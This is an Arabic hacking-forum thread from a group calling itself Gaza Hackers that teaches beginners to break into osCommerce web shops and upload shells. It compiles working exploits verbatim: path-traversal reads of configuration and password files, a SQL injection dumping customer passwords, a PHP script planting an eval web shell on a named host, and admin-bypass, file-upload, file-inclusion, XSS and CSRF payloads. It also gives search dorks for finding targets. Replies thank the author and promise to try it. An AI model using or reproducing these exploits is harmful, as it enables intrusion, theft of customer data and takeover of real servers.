تذكرنــي
التسجيل التعليمات التقويم البحث مشاركات اليوم اجعل كافة الأقسام مقروءة



:: قسم خاص بالمبتدئين ::

يرجى عدم اضافة موضوع ( فقط للادارة) .. عليكم فقط متابعة مواضيعنا


اضافة رد

 
أدوات الموضوع انواع عرض الموضوع

رقم المشاركة : ( 1 )
الصورة الرمزية Casper
Casper
:: فريق قراصنة غزة ::

Casper غير متواجد حالياً
 
رقم العضوية : 20
تاريخ التسجيل : Jul 2009
مكان الإقامة :
عدد المشاركات : 14,332
عدد النقاط : 10
قوة التقييم :
غريب ./~ حَنتِ يَدآيَ لـِ مِسَآسِ يدآها [ BK ]
Talking الشرح الكامل لثغرة Powered by osCommerce .. رفع شل بسهوله على السيرفر

كُتب : [ 01-31-2011 - 06:57 AM ]




السلام عليكم ورحمة الله وبركاته ..


كما وعدكم ان اشرح شرح كامل لـ ثغرة بسكربت Powered by osCommerce
السكربت منتشر ولا يوجد سيرفر اجنبي او ايراني او احيانا اسرايلي الا وتجد على السيرفر مركب السكربت



شرح كامل لـ ثغرة بسكربت Powered by osCommerce وطرق مضمونه لرفع الشل
اولا سأعرض الشروحات :
1 - شرح كيفية العمل بالثغره ..
إضغط هنـــا للتحميل , إضغط هنـــا للتحميل , إضغط هنـــا للتحميل ,
إضغط هنـــا للمشاهده ,


2 - شرح اضافة يزر ..
إضغط هنـــا للتحميل , إضغط هنـــا للتحميل , إضغط هنـــا للتحميل ,
إضغط هنـــا للمشاهده ,


3 - شرح اماكن رفع الشل ..
إضغط هنـــا للتحميل , إضغط هنـــا للتحميل , إضغط هنـــا للتحميل ,
إضغط هنـــا للمشاهده ,


4 - تخطي مشكلة Internal Server Error عند رفع الشل ..
واضفت مع هادا الشرح طريقة رفع الشل بدون الدخول عمل يزر او بدون عضوية ادمن ..

إضغط هنـــا للتحميل , إضغط هنـــا للتحميل , إضغط هنـــا للتحميل ,
إضغط هنـــا للمشاهده ,


باسوورد فك الضغط للملفات :
كود:
Www.Gaza-Hacker.Net
طبعا بالأضافه لموضوع
( صوت وفيديو ) رفع شل على السيرفر بأقل من ثواني وشرح بداية ثغرة Powered by osCommerce
http://gaza-hacker.net/cc/showthread-t_18064.html


ملاحظه مهمه : السكربت كما قلنا مشهور جداا .. يوجد من السكربت اصدارات مختلفه اهم شيء تفهم اول درس كيف تتصفح بالملفات

ثانيا طريقة البحث عن السكربت بالسيرفر بالشكل التالي :




كما شاهدتم نكتب بعد الاي بي نعمل مسطره ثم نجرب هادوله الكلمات ال 3

cPath
او
osCommerce
او
product واحيانا products


ويهك انتهينا الشرح الكامل لطريقة البحث عن السكربت + طريقة عمل يزر + طريق مضمونه لرفع الشل ..

راح احط الكم بعد شويه الثغرات كامله وكل ثغره معها دورك

انتهى ..

جميع الحقوق محفوظه لمنتدى قرآصنة غزه
Mr.Le0n & Claw & Casper





المنتدى الرسمي لفريق قراصنة غزه
منتدى قراصنة غزه , مركز تسجيل اختراقات , مركز رفع الصور

توقيع : Casper


أدركت سر رعب الطواغيت من الحركات الإسلامية الخالصة، وهلعهم من أبنائها الصادقين، وذلك لأنهم يتمردون على الدنيا التي يملكها الطغاة، ويدوسون المتاع الرخيص الذي بين أيدي الجبابرة والذي من خلاله يجمعون القطيع ويسوقونه إلى مذابح شهواتهم قرابين رخيصة، إنها عناصر فريدة لا تباع في سوق النخاسة ولا تذوب في حوامض الجاهلية، فتحافظ على أصالتها ونقائها ومثلها ومبادئها في أي جو عاشت ومع أي قوى التقت.
ـــــــــ
عبد الله عزام تقبله الله



آخر تعديل بواسطة Casper ، 09-17-2012 الساعة 06:52 PM
رد مع إقتباس
الأعضاء الذين آرسلوا آعجاب لـ Casper على المشاركة المفيدة:
yessin (03-02-2014)
بياناتي
 رقم المشاركة : ( 2 )
Casper
:: فريق قراصنة غزة ::

رقم العضوية : 20
تاريخ التسجيل : Jul 2009
مكان الإقامة :
عدد المشاركات : 14,332
عدد النقاط : 10

Casper غير متواجد حالياً

غريب ./~ حَنتِ يَدآيَ لـِ مِسَآسِ يدآها [ BK ]

افتراضي

كُتب : [ 01-31-2011 - 07:15 AM ]





ثانيا : تسجيل ثغرات السكربت بالترتيب .. من اول ثغره حتى اخر ثغره نزلت حديثا

2006-04-14
osCommerce <= 2.2 (extras) Source Code Disclosure Vulnerability
كود PHP:
---- osCommerce <= 2.2 "extras/" information/source code disclosure ------------
 
software sitehttp://www.oscommerce.com/
 
 
if extrasfolder is placed inside the www pathyou can see all files on target
system
including php source code with database detailspoc:
 
http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php
http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/passwd
 
this is the vulnerable code in update.php:
 
...
    include 
'../mysql.php';
    
// if a readme.txt file exists, display it to the user
    
if(!$read_me) {
        if(
file_exists('readme.txt')) {
            
$readme_file 'readme.txt';
        }
        elseif(
file_exists('README')) {
            
$readme_file 'README';
        }
        elseif(
file_exists('readme')) {
            
$readme_file 'readme';
        }
        if(
$readme_file) {
            
$readme file($readme_file);
            print 
"<CENTER><TABLE BORDER=\"1\" WIDTH=\"75%\" CELLPADDING=\"2\" CELLSPACING=\"0\"><TR BGCOLOR=\"#e7e7cc\"><TD>\n";
            print 
nl2br(htmlentities(implode($readme' ')));
            print 
"<HR NOSHADE SIZE=\"1\"><CENTER><A HREF=\"update.php?read_me=1\"><B>Continue</B></A></CENTER>\n";
            print 
"</TD></TR></TABLE>\n";
            exit;
        }
    }
...
 
google search:
 
inurl:"extras/update.php" intext:mysql.php -display
 
--------------------------------------------------------------------------------
rgod
 
site
http://retrogod.altervista.org
mailrgod at autistici.org
original advisory
http://retrogod.altervista.org/oscommerce_22_adv.html
--------------------------------------------------------------------------------
 
# milw0rm.com [2006-04-14] 



2008-02-07
osCommerce Addon Customer Testimonials 3.1 SQL Injection Vulnerability

كود PHP:
#########################################################
##
##  osCommerce SQL Injection (customer_testimonials.php)
##
##
##  Author: it's my
##
##  Home page: http://www.antichat.ru
##
#########################################################
##
## Dork: inurl:"customer_testimonials.php"
##
#########################################################
    
   
Exploit:
 
http://site.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
 
#########################################################
## it's my sick world =/   ####    www.antichat.ru
#########################################################
 
sourcehttp://addons.oscommerce.com/info/5477
 
# milw0rm.com [2008-02-07] 




2009-08-31
osCommerce Online Merchant 2.2 RC2a Code Execution Exploit

كود PHP:
<?php
print_r
('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: [email protected]
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n ã€puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
'
);
$host ='democn.51osc.com';
$path '/';
$admin_path 'admin/';
$shellcode "filename=fly.php&file_contents=test<?php%[email protected](\$_POST[aifly]);?>";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd fsockopen($host,'80');
if(!
$fd)
{
    echo 
'[~]No response from'.$host;
    die;
}
fputs($fd,$message);
echo (
"[+]Go to see U webshell : $host/fly.php");
?>
 
# milw0rm.com [2009-08-31]


2009-12-26
oscommerce <= 2.2rc2a Bypass/Create and Download Backup Vulnerability

كود PHP:
========================================================================================             $
# Title    : osCommerce online SHop Backup Vulnerability                                           $
# Author   : indoushka                                                               |
# email    : [email protected]                                                   |
# Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
# EDB-ID   :                                                                         |
# CVE-ID   : ()                                                                      |
# OSVDB-ID : ()                                                                      |
# DAte     :16/12/2009                                                               |
# Verified :                                                                         |
# Web Site : www.iq-ty.com                                                           |
# Published:                                                                         |
# Script   : Powered by osCommerce online SHop http://www.oscommerce.com/            |
# Tested on: windows SP2 Fran碶ais V.(Pnx2 2.0) + Lunix Fran碶ais v.(9.4 Ubuntu)       |
# Bug      : Backup                                                                  |
======================      Exploit By indoushka       =================================
# Exploit  :
|
http://127.0.0.1/oscommerce-2.2rc2a/catalog/admin/backup/login.php?action=backup
 
http://127.0.0.1/oscommerce-2.2rc2a/catalog/admin/backup/login.php?action=backupnow
 
to download buckup :http://127.0.0.1/oscommerce-2.2rc2a/catalog/admin/backup/login.php?action=download&file=db_comm-20100301222138.sql
 
db_comm-20100301222138.sql chang it to the name of the backup and you cant download it with IE i download it with opera 10.10 Mozilla Firefox
 
http
://127.0.0.1/oscommerce-2.2rc2a/catalog/admin/file_manager/login.php?action=upload (2 upload ev!l "not finishid")
 
go to original path
 
http
://127.0.0.1/oscommerce-2.2rc2a/catalog/
|
================================   
Dz-Ghost Team   ========================================
Greetz all my friend Dos-Dz Snakespc His0k4 Hussin-Str0ke Saoucha Star08 |
------------------------------------------------------------------------------------------- 


2010-05-30
Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass

كود PHP:
--------------------------------------------
Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass
--------------------------------------------
 
Author Flyff666
Date 
May302010
Location 
TangerangIndonesia
Time Zone 
GMT +7:00
Software 
OsCommerce Online Merchant v2.2
Tested on 
All OS
--------------------------------------------
Email Dream_Theatre@rocketmail.com
gReets 
Mywisdom(abang.. wkkwkwk), KiddiesChaerPetimatic4uR
WhiteHat
Cruz3nGunslingerv3n0mz0mb13Bumble_be
Spykit
BobyHikaruFriboall member.
Site Http://www.Devilzc0de.org/forum/
Forum Http://Indonesianhacker.or.id/
--------------------------------------------
 
# ByPass Page Admin :
 
You can use this Trick if admin folder not protected by .htaccess
 
if you Want to explore admin page without loginYou can use /login.php behind the name of the file
 
Example 
:
 
http://[site]/admin/backup.php/login.php
 
or
 
http://[site]/admin/file_manager.php/login.php
 
Demo :
 
http://server/store/admin/file_manager.php/login.php
 
You can See all file in Directory Oscommerce.. haha ;)
 
and 
you can download all file with tRick above
 
 
# File Disclosure :
 
in admin/file_manager.php/login.php?action=download&filename=
 
Exploit admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
 
Example 
http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php 


2010-05-30
Oscommerce Online Merchant v2.2 - Remote File Upload

كود PHP:
      ______                _       _   _            
      
___ \              | |     | | (_)           
      | |
_/ /_____   _____ | |_   _| |_ _  ___  _ __ 
      
|    // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \  
      
| |\ \  __/\ / (_) | | |_| | |_| | (_) | | | |  
      \
_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_|
 
        
_____                      _____  _____
       
|_   _|                    |  _  ||  _  |
         | | 
___  __ _ _ __ ___   | |/' || |_| |
         | |/ _ \/ _` | '
` _ \  |  /| |\____ |
         | |  __/ (_| | | | | | | \ |_/ /.___/ /
         \_/\___|\__,_|_| |_| |_|  \___/ \____/
          
                           DEFACEMENT it's for script kiddies...
_____________________________________________________________
    
[$] Exploit Title     : Oscommerce Online Merchant v2.2 - Remote File Upload
[$] Date              : 30-05-2010           
[$] Author            : MasterGipy
[$] Email             : mastergipy [at] gmail.com
[$] Bug               : Remote File Upload
[$] Vendor            : http://www.oscommerce.com
[$] Google Dork       : n/a
 
 
[%] vulnerable file: /admin/file_manager.php
 
[REMOTE FILE UPLOAD VULNERABILITY]
 
[$] Exploit:
 
<html><head><title>Oscommerce Online Merchant v2.2 - Remote File Upload </title></head>
<br><br><u>UPLOAD FILE:</u><br>
<form name="file" action="http://<--  CHANGE HERE   -->/admin/file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data">
<input type="file" name="file_1"><br>
<input name="submit" type="submit" value="   Upload   " >
</form>
 
<br><u>CREATE FILE:</u><br>
<form name="new_file" action="http://<--  CHANGE HERE   -->/admin/file_manager.php/login.php?action=save" method="post">
FILE NAME:<br>
<input type="text" name="filename">&nbsp; (ex. shell.php)<br>FILE CONTENTS:<br>
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>
<input name="submit" type="submit" value="   Save   " >
</form>
</html>
 
 
 
[=] Thanks to  Flyff666 for the original exploit:
    - Oscommerce Online Merchant v2.2 File Disclosure / Admin ByPass
 
[§] Greetings from PORTUGAL ^^ 



2010-07-20
EZ-Oscommerce 3.1 Remote File Upload

كود PHP:
====================================================
EZ-Oscommerce 3.1 Remote File Upload
====================================================
 
########################################################################
# Vendor: http://www.ezosc.com
# Date: 2010-05-27
# Author : indoushka
# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact : [email protected]
# Home : www.arab-blackhat.co.cc
# Dork :Powered by osCommerce | Customized by EZ-Oscommerce
# Bug  : Remote File Upload
# Tested on : windows SP2 Fran?ais V.(Pnx2 2.0)
########################################################################
                                                                                                                                                                                                 
# Exploit By indoushka
 
 
<html><head><titleEZ-Oscommerce 3.1 Remote File Upload </title></head>
 
<
br><br><u>UPLOAD FILE:</u><br>
 
<
form name="file" action="http://site/admin/file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data">
 
<
input type="file" name="file_1"><br>
 
<
input name="submit" type="submit" value="   Upload   " >
 
</
form>
 
<
br><u>CREATE FILE:</u><br>
 
<
form name="new_file" action="http://site/admin/file_manager.php/login.php?action=save" method="post">
 
FILE NAME:<br>
 
<
input type="text" name="filename">  (exshell.php)<br>FILE CONTENTS:<br>
 
<
textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>
 
<
input name="submit" type="submit" value="   Save   " >
 
</
form>
 
Dz-Ghost Team ===== Saoucha Star08 Redda theblind74 XproratiX onurozkan n2n Meher Assel ===========================
all my friend :
His0k4 Hussin-Rafik Yashar SoldierOfAllah RiskY.HaCK Stake r1z D4NB4R www.alkrsan.net MR.SoOoFe ThE g0bL!N
(cr4wl3r Let the poor live ) * RoAd_KiLlEr AnGeL25dZ ViRuS_Ra3cH
--------------------------------------------------------------------------------------------------------------------------------- 



2010-08-26
osCommerce Online Merchant Remote File Inclusion Vulnerability

كود PHP:
# Exploit Title: [oscommerce-3.0a5 Remote File Inclusion ]
# Date: [26-8-2010]
# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
# Software Link: [http://www.oscommerce.com/solutions/downloads]
# Version: [v 3.0 ]
# Tested on: [Windows XP]
# CVE :
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  [email protected]
 
+++++++++++++++++++++++++++++++++++++++++++++++++++++
Exploithttp://target/oscommerce-3.0a5/oscommerce-3.0a5/oscommerce/includes/classes/actions.php?module=[SHeLL]
 
+++++++++++++++++++++++++++++++++++++++++++++++++++++
A special tribute toDannY.iRaQi TeaM iRaQ HaCkers 



2010-09-27
Allpc 2.5 osCommerce SQL/XSS Multiple Vulnerabilities

كود PHP:
[+]Title           Allpc 2.5 osCommerce  SQL-i/XSS Multiple Vulnerabilities
[+]Author          **RoAd_KiLlEr**
[+]
Contact        RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on      Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] 
Founded by **RoAd_KiLlEr**
[~] 
TeamAlbanian Hacking Crew
[~] Version:    2.5
[~] Vendorhttp://www.allpcscript.com
==========ExPl0iT3d by **RoAd_KiLlEr**==========
 
[+]
Description:
Compatible with all versions of PHP 4 and above.
It uses a database MySQL.
It works in 4 languageswhich are easily replaced in the administration panel.
 
Appearance:
The client part
Administration
 
Install Installation
Simple automatic installation via the web-browser
 
Design Placement
A simple change of patterns
Support for dynamic images
 
Administration Functional
Supports unlimited products and categories
The structure of products in categories
The structure of the categories to the categories
Add edit delete categoriesproductsmanufacturerscustomers, and reviews
Support for physical (shippable) and virtual (zagruzhaemyeproducts
Land Administration is protected with username and password
Contact customers directly via email or contact the user
Easy to book and restore the database
- Print invoices and packaging lists from the order
Statistics for products and customers
Multilingual support
Support the use of multiple currencies
Automatic exchange rates
Select what to display, and in what order the product that make the list page
Support for static and dynamic banners with full statistics
=========================================
 
[+].  
SQL-i Vulnerability
=+=+=+=+=+=+=+=+=+
 
[
P0C]:  http://127.0.0.1/allpc25free/product_info.php?products_id=[SQL Injection]
 
[DemO]: http://127.0.0.1/allpc25free/product_info.php?products_id=[SQL Injection]
 
[+]. XSS Vulnerability
=+=+=+=+=+=+=+=+=
 
The Search B0x of this script is vulnerable to XSS,because it fails to properly sanitize the response.
By submitting a malicious input to the web sitethe user would only be able to compromise their security.That is their own browser ******scache objects, and so forth.
 
 
[
DemO]: http://neways4u.com/advanced_search_result.php?keywords=%22%3E%3Cscript%3Ealert(********.******)%3C/script%3E
 
[Atack Pattern]: ">**********alert(********.******)</script>
 
 I used this pattern to show you that is vulnerable,but you can try HTML Injection,Url Redirect, Iframe,Etc.. Basically Your own Imagination is your Limit..
 Good Luck :P
 
 
===========================================================================================
[!] Albanian Hacking Crew          
===========================================================================================
[!] **RoAd_KiLlEr**  
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | The|DennY` | EaglE EyE | THE_1NV1S1BL3 & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks:  r0073r  | indoushka | Sid3^effects| L0rd CruSad3r | SONIC | MaFFiTeRRoR | All  Inj3ct0r.com Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
=========================================================================================== 



2010-11-09
osCommerce v2.2 CSRF

كود PHP:
# Exploit Title: osCommerce v2.2 Change Admin Pass
# Date: [date]
# Author: daandeveloper33
# Software Link: http://oscommerce.com/
# Version: v2.2
# Tested on: Mac OS X 10.6.4, osCommerce v2.2 RC2A (Dutch)
 
This is the code that you can execute to change the admin pass:
-------crack.php-------
<?/*Author: daandeveloper33
E-Mail: [email protected]
Software: osCommerce v2.2
Date: 09 Nov 2010
Description: Change the admin password of the admin panel of oscommerce.And then you have got all admin privileges
*/
?>
<HTML><BODY>
<form name="administrator" action="http:/server/linktoadminpanel/administrators.php/login.php?aID=1&action=save" method="post"> Change Admin Pass
    Username<br><input type="text" name="username" value="admin">
    <br>Password<br><input type="password" name="password" maxlength="40"></td>
    <br><input type="submit" alt="Update" title=" Update " value="Change It!">     <a href="http://server/linktoadminpanel/administrators.php/login.php?aID=1">    </a>
</form>
</BODY></HTML>
----------------------------
This is the code to protect against this attack:
First Write protection.php:
-------protection.php-----
<?$self $_SERVER['PHP_SELF'];
$pos strpos($self'login.php');if($pos == true){echo "<script language='**********'>window.location = 'http://server/index.php';</script>";}?>----------------------------Save protection.php in the admin map of oscommercethen paste following code in all pages in the /admin map(expect login.php): include('protection.php')
 
 
 
 
Greets,
daandeveloper33



2010-11-20
osCommerce Remote File Upload Vulnerability (/admin/categories.php)

كود PHP:
# Exploit Title: [oscommerce remote upload from categories.php]
# Google Dork: ["powered by oscommerce"] 
# Date: [20-November-2010]
# Author: [Number 7]
#Contact: {an[dot]7[at]live[dot]fr}
# Software Link: [http://www.oscommerce.com/solutions/downloads]
# Tested on: [windows-linux-FreeBSD-Solaris]
 
exploit:
<html>
<head>
<title>Number 7</title>
</head>
<body>
<div style="text-align: center;"><big
 style="color: rgb(253, 0, 0);"><big><big>Discovered
By Number 7<br>
</big></big></big><span
 style="color: rgb(102, 102, 102);">(best defacer kairouan
tunisia 2010)</span><br>
</div>
<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>Oscommerce
script: Remote File Upload in /admin/Categories.php</big></big><br>
<?php $host ="site";
$path ="ath";
?>
<form name="new_product"
 action="http://<?php echo $host;echo $path?>/admin/categories.php/login.php?cPath=&action=new_product_preview"
 method="post" enctype="multipart/form-data"><br>
  <input name="products_image" type="file"><br>
  <input name="submit" value=" Save " type="submit"><br>
  <big style="font-weight: bold; color: rgb(253, 0, 0);"><big>shell
here:</big></big><br>
<?php echo ("Using upload File : <a href=http://$host/$path/images/product_info.php>$host/</>$path</>/images/product_info.php</a></font></body>");
?></form>
</body>
</html>
 
[~] Greetz tO: [Meher-Assel(Net-Own3r#Shichemt-Älen#Sami(s-man)#zone-h/crew#all tunisian hackers]
[~] Home     :info-geek.com/ # v4-team.com/cc/



انتهت هادي كل الثغرات المسجله .. وفيها طبعا دوركات
بالاضافه لـ هاده الدورك
كود:
Dork : index.php?cPath=


لآ تنسونا من صآلح دعائكم ..
فريق قرآصنة غزه ..
Mr.Le0n & Claw & Casper

توقيع : Casper


أدركت سر رعب الطواغيت من الحركات الإسلامية الخالصة، وهلعهم من أبنائها الصادقين، وذلك لأنهم يتمردون على الدنيا التي يملكها الطغاة، ويدوسون المتاع الرخيص الذي بين أيدي الجبابرة والذي من خلاله يجمعون القطيع ويسوقونه إلى مذابح شهواتهم قرابين رخيصة، إنها عناصر فريدة لا تباع في سوق النخاسة ولا تذوب في حوامض الجاهلية، فتحافظ على أصالتها ونقائها ومثلها ومبادئها في أي جو عاشت ومع أي قوى التقت.
ـــــــــ
عبد الله عزام تقبله الله


رد مع إقتباس
بياناتي
 رقم المشاركة : ( 3 )
Victim
v!p
رقم العضوية : 11676
تاريخ التسجيل : Aug 2010
مكان الإقامة :
عدد المشاركات : 2,185
عدد النقاط : 10

Victim غير متواجد حالياً

كنـ معـْيٍ وٍلا تَكْــُنُ ضْدِيٍ كٍيِ لا تكـًوٍنٍ ضْحِيًتيِ

افتراضي

كُتب : [ 01-31-2011 - 07:36 AM ]


ايش هاد يا معلم والله انك فنان انشاء الله بس اخلص
دراسة بقوم بلعمل عليهم واطلعك على النتائج انشاء الله

المشـــــوار اطــــــــــويل

تحياتي لك يا ملك


توقيع : Victim

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 4 )
7ak1mk1ll3r

رقم العضوية : 10257
تاريخ التسجيل : Jun 2010
مكان الإقامة :
عدد المشاركات : 213
عدد النقاط : 10

7ak1mk1ll3r غير متواجد حالياً

افتراضي

كُتب : [ 01-31-2011 - 09:09 AM ]


يعطيك العافية أخي casper


توقيع : 7ak1mk1ll3r

لو لا خوفي من الرحمان و خوفي من النيران لكن حبي لي تونس سادس الأركان

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 5 )
ليث المشاهـد

رقم العضوية : 15274
تاريخ التسجيل : Oct 2010
مكان الإقامة :
عدد المشاركات : 2,516
عدد النقاط : 10

ليث المشاهـد غير متواجد حالياً

" أتوق اليها .. وأنتظرها بشوق تأتيني "

افتراضي

كُتب : [ 01-31-2011 - 09:17 AM ]


ما اجمل يومي ويا حظي هههه


اليوم نتفحص الدرس هذا تفحص كامل ان شاء الله

وما اخرج الا وطبقت كامل باذن الله

جزيتم خيراً اخواني فريق قراصنه غزه

ابداع ابداع


توقيع : ليث المشاهـد

ثلاثٌ يعزّ الصبر عند حلولها *** ويذهل عنها عقل كل لبيبِ
خروج اضطرار من بلاد تحبها *** وفرقة إخوانٍ وفقد حبيبِ


لـعمركَ مـا الـرزيـةُ فقـد مالٍ ** ولا شــاةٌ تـمـوتُ ولا بعـيــرُ
ولكــن الـرزيــةَ فـقــد حـــرّ ** يمـوتُ لـموته خلقٌ كـثـيــرُ

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 6 )
muslim
.:: قسم إختراق الأجهزه والبريد لاكتروني ::.
رقم العضوية : 5840
تاريخ التسجيل : Jan 2010
مكان الإقامة :
عدد المشاركات : 636
عدد النقاط : 10

muslim غير متواجد حالياً

Mu$liM

افتراضي

كُتب : [ 01-31-2011 - 09:25 AM ]


شكرا أخي Casper
على الشروحات القويه
تحياتي


توقيع : muslim

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 7 )
◄Th-Mx►
v!p
رقم العضوية : 10531
تاريخ التسجيل : Jul 2010
مكان الإقامة :
عدد المشاركات : 996
عدد النقاط : 10

◄Th-Mx► غير متواجد حالياً

Th-MҲ͡ ζ̮͡Ẋ ®

افتراضي

كُتب : [ 01-31-2011 - 10:43 AM ]


يا سلاااااام
والله انك روعه يا كاااسبر
Downloadind
ولي عودة


توقيع : ◄Th-Mx►

أحب الصالحين ولست منهم لعلي أن أنال بهم شفاعة
وأكره مـن تجـارته الـمعاصــي ولو كنا سواء في البضاعة
Contact Me :- @
[email protected]

رد مع إقتباس

اضافة رد

العلامات المرجعية

الكلمات الدلالية (Tags)
لثغرة, السيرفر, الشرح, الكامل, بسهوله, رفع, oscommerce, powered, علي


يتصفح الموضوع حالياً : 1 (0 قرصان و 1 ضيف)
 
أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع


جميع الأوقات بتوقيت GMT +2. الساعة الآن 06:59 AM.



أقسام المنتدى

الأقسام الإسلامية @ .:: القسم الإسلامي العام ::. @ .:: قسم القرآن الكريم وتجويده ::. @ .:: قسم الاناشيد والشريط الاسلامي ::. @ .:: سيرة و قصص الأنبياء و الصحابة ::. @ الأقسام العامة @ .:: قسم الساحة العامة ::. @ .:: قسم فـلـسـطــيــن ::. @ .:: قسم للتوعية الأمنية ::. @ .:: عالم البرامج الكاملة والنادرة ::. @ .:: قسم أخبار التقنية المعلوماتية والتكنولوجية ::. @ .:: قسم عالم المحادثة ::. @ .:: قسم الأمن و الحماية | Security ::. @ ::. قسم حماية الاجهزة والايميلات .:: @ ::. قسم حمايه المواقع والسيرفرات.:: @ ::. قسم إختراق المواقع والأجهزة والبريد الإلكتروني | Hacker .:: @ ::. قسم إختراق المواقع والمنتديات .:: @ ::.قسم إختراق الأجهزه والبريد الاكتروني .:: @ .:: قسم الثغرات ::. @ .:: الركن الترفيهي ::. @ .:: قسم الصور ::. @ .:: ركن الأدارية ::. @ .:: قسم الشكاوي ولأقتراحات ::. @ خاص بشروحات الفيديو @ الأدوات , hack tools @ .:: قسم مساعدة الاعضاء ::. @ :: المواضيع المحذوفة :: @ قسم الانجازات @ .:: جديد قراصنة غزة ::. @ :: قسم استراحة الأعضاء :: @ :: YouTube :: @ .:: القسم التقني ::. @ :: عالمـ الكومبيوتر :: @ :: قسم الجوالات والاتصالات :: @ :: قسم التصميم والغرافيك :: @ خاص للادارة والمشرفين @ :: قسم خاص بالمبتدئين :: @ :: خاص بثغرات المتصفح :: @ :: خاص بشروحات الفيديو :: @ .:: الدورات المقدمة من المشرفين ::. @ :: مشآكل الكومبيوتر وحلولها :: @ .:: للنقاش الجاد ::. @ الملتقى الأدبي .. @ :: طلبات الإشراف :: @ :: كتب الحماية والاختراق security&hacking :: @ البحوث العلمية @ تعليم اللغات الأجنبية @ .:: كتب الكترونية منوعة ::. @ .:: القسم الدعوي ::. @ قسم الكتب الاسلامية @ قسم المواضيع المميزة @ :: قسم خاص بالتشفير :: @ قسم اخبار العالم وقضايا الأمة الإسلامية @ Local root @ دورة إحترآف إلـ Spam Email @ فلسطين , palestine @ .:: مدن وقرى فلسطين ::. @ .:: تاريخ فلسطين ::. @ .:: شهداء فلسطين ::. @ .:: مدينة القدس ::. @ .:: مدينة غزة ::. @ .:: لعروض التصاميم ::. @ .:: لدروس التصاميم ::. @ :: قسم اصدارات وانجازات الفريق :: @ .:: قسم قضية فلسطين ::. @ .:: قسم عروض الاستايلات :.. @ قسم اخبار وقضايا اليهود @ .:: قسم الهاكات وتطوير المنتديات ::. @ ::. قسم المسابقات والنشاطات .:: @ لوحة تحكم سي بانل , cPanel Management @ حماية قواعد البيانات mysql , sql @ لوحة تحكم , Plesk Management @ ادارة سيرفرات Linux @ .:: SQL-injection , حقن قواعد بيانات ::. @ :: قسم خاص بالمبتدئين :: @ .:: قسم الكتب الالكترونية E-BOOK ::. @ .:: قسم تفسير القران الكريم ::. @ قسم الدفاع عن النبي محمد والصحابة وآل البيت @ .:: قسم لغات البرمجة ::. @ قسم برمجة لغة Php , Html @ قسم برمجة لغة mysql , sql @ .:: القسم الرمضانى ::. @ جديد الشيخ نبيل العوضى @ حجب الخدمة , ddos attack @ قسم الاختراق المتقدم @ .:: حماية الاجهزة وطرق كشف التلغيم ::. @ .:: قسم حماية الايميلات :. @ قسم اختراق سيرفرات windows @ .:: دورة قراصنة غزة للتصميم ::. @ .::: أسرى فلسطين ::. @ مدرسة قراصنة غزة لحقن قواعد البيانات @ ::. قسم مشروع الباك تراك backtrack , الميتاسبلويت MetaSploit .:: @ فريق :: Gaza HaCker Injector Team-GHI :: @ دورة أساتذة حقن قواعد البيانات المتقدمة لعام 2017 / 2018 @ GH-InjeCtor-Team @ .:: قسم الصلاة ثم الصلاة ::. @ وَحَرِّضِ الْمُؤْمِنِينَ @ قسم انظمة لينكس Linux, Unix @ قسم الالعاب الالكترونية @ قسم اختراق الشبكات السلكية واللاسلكية @ قسم الميكاترونكس (بناء الروبوتات) @ قسم الدورات المدفوعة @ قسم اختراق الاجهزة اللوحية @ دورات حقن قواعد البيانات للمٌبتدئين من الألف إلى الإحتراف @